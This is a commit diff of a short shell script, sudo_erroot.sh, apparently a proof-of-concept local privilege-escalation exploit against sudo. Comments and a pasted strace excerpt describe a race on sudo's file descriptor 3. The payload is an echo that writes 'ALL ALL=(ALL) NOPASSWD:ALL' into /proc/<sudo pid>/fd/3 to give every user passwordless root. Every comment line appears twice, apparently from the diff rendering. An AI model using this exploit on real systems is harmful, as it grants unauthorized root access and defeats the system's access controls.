oxagast/sudo_erroot.sh

## 22 changes: 22 additions & 0 deletions sudo_erroot.sh
@@ -6,4 +6,26 @@

    # descriptor 3 it gives you root!
# descriptor 3 it gives you root!

    # Cavets: sudo must be running asking for a password at the time.
# Cavets: sudo must be running asking for a password at the time.

    #         you must have write permission to 3.
#         you must have write permission to 3.

    #
#

    # Race condition between when getting the uid of sudo and the
# Race condition between when getting the uid of sudo and the

    # setresuid and openat() syscall before being reset to 0 here.
# setresuid and openat() syscall before being reset to 0 here.

    #
#

    # --- SNIP ---
# --- SNIP ---

    # getresuid([0], [0], [0])                = 0
# getresuid([0], [0], [0])                = 0

    # getresgid([0], [0], [0])                = 0
# getresgid([0], [0], [0])                = 0

    # openat(AT_FDCWD, "/etc/nsswitch.conf", O_RDONLY) = 3
# openat(AT_FDCWD, "/etc/nsswitch.conf", O_RDONLY) = 3

    # fstat(3, {st_mode=S_IFREG|0644, st_size=556, ...}) = 0
# fstat(3, {st_mode=S_IFREG|0644, st_size=556, ...}) = 0

    # read(3, "# /etc/nsswitch.conf\n#\n# Example"..., 4096) = 556
# read(3, "# /etc/nsswitch.conf\n#\n# Example"..., 4096) = 556

    # read(3, "", 4096)                       = 0
# read(3, "", 4096)                       = 0

    # close(3)                                = 0
# close(3)                                = 0

    # setresuid(-1, 1, -1)                    = 0
# setresuid(-1, 1, -1)                    = 0

    # stat("/etc/sudoers", {st_mode=S_IFREG|0440, st_size=39, ...}) = 0
# stat("/etc/sudoers", {st_mode=S_IFREG|0440, st_size=39, ...}) = 0

    # openat(AT_FDCWD, "/etc/sudoers", O_RDONLY) = 3
# openat(AT_FDCWD, "/etc/sudoers", O_RDONLY) = 3

    # fstat(3, {st_mode=S_IFREG|0440, st_size=39, ...}) = 0
# fstat(3, {st_mode=S_IFREG|0440, st_size=39, ...}) = 0

    # read(3, "root ALL=(ALL) ALL\n%sudo ALL=(AL"..., 4096) = 39
# read(3, "root ALL=(ALL) ALL\n%sudo ALL=(AL"..., 4096) = 39

    # lseek(3, 0, SEEK_SET)                   = 0
# lseek(3, 0, SEEK_SET)                   = 0

    # fcntl(3, F_SETFD, FD_CLOEXEC)           = 0
# fcntl(3, F_SETFD, FD_CLOEXEC)           = 0

    # setresuid(-1, 0, -1)                    = 0
# setresuid(-1, 0, -1)                    = 0

    # --- SNIP ---
# --- SNIP ---


    echo "ALL ALL=(ALL) NOPASSWD:ALL" > /proc/`pgrep sudo`/fd/3
echo "ALL ALL=(ALL) NOPASSWD:ALL" > /proc/`pgrep sudo`/fd/3

## 9 changes: 9 additions & 0 deletions sudo_erroot.sh
@@ -0,0 +1,9 @@

    # oxagast / Marshall Whittaker
# oxagast / Marshall Whittaker

    #
#

    # The echo line uses sudoers file format to allow for everyone to
# The echo line uses sudoers file format to allow for everyone to

    # use the root account and writes it to proc/23423/fd/3 (where
# use the root account and writes it to proc/23423/fd/3 (where

    # the number is sudo's process.  If you have write access to file
# the number is sudo's process.  If you have write access to file

    # descriptor 3 it gives you root!
# descriptor 3 it gives you root!

    # Cavets: sudo must be running asking for a password at the time.
# Cavets: sudo must be running asking for a password at the time.

    #         you must have write permission to 3.
#         you must have write permission to 3.

    echo "ALL ALL=(ALL) NOPASSWD:ALL" > /proc/`pgrep sudo`/fd/3
echo "ALL ALL=(ALL) NOPASSWD:ALL" > /proc/`pgrep sudo`/fd/3